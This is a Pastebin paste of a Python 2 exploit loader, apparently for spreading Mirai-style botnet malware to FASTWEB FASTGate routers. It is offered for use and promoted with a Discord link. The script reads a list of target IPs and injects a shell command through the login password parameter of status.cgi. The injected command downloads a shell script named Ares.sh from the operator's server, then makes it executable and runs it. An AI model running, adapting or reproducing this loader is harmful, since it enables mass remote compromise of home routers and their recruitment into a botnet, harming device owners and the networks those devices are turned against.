Advertisement
xB4ckdoorREAL

[REPOST][FASTWEB FASTGATE 00.67 EXPLOIT LOADER] [RCE] [MIRAI

Feb 10th, 2020
781
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.24 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. # FASTWEB FASTGate 0.00.67 Exploit loader made by B4CKDOOR #
  4. # B4CKDOORARCHIVE.HOST - https://discord.gg/MVktpTW #
  5.  
  6. import threading, random, socket, time, sys, requests, re, os
  7. from threading import Thread
  8. from time import sleep
  9. import requests
  10. from requests.auth import HTTPDigestAuth
  11. from decimal import *
  12.  
  13. if len(sys.argv) < 2:
  14.     print "\033[37mUsage: python "+sys.argv[0]+" <list>\033[37m"
  15.     sys.exit()
  16.  
  17. ip = "1.3.3.7" # YOUR BINS IP LOCATION
  18. vulns = open(sys.argv[1], "r").readlines()
  19.  
  20. cmd2 = "wget http://" + ip + "/Ares.sh; curl -O http://" + ip + "/Ares.sh; chmod +x Ares.sh; ./Ares.sh"
  21.  
  22. class send_payload(threading.Thread):
  23.     def __init__ (self, ip):
  24.         threading.Thread.__init__(self)
  25.         self.ip = str(ip).rstrip('\n')
  26.     def run(self):
  27.         try:
  28.             url = "http://" + self.ip + "/status.cgi_=1526904600131&cmd=3&nvget=login_confirm&password='|"+cmd2+"|'&remember_me=1&sessionKey=NULL&username=jj"
  29.             requests.get(url, timeout=3)
  30.             print "[FASTWEB] Loading: %s"%(self.ip)
  31.         except:
  32.             pass
  33.  
  34. for IP in vulns:
  35.     try:
  36.         ip = "".join(IP)
  37.         ip = ip.replace("\n", "")
  38.         t = send_payload(ip)
  39.         t.start()
  40.         time.sleep(0.03)
  41.     except:
  42.         pass #CODED BY B4CKDOOR - JOIN MY DISCORD BY MY ARCHIVE
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement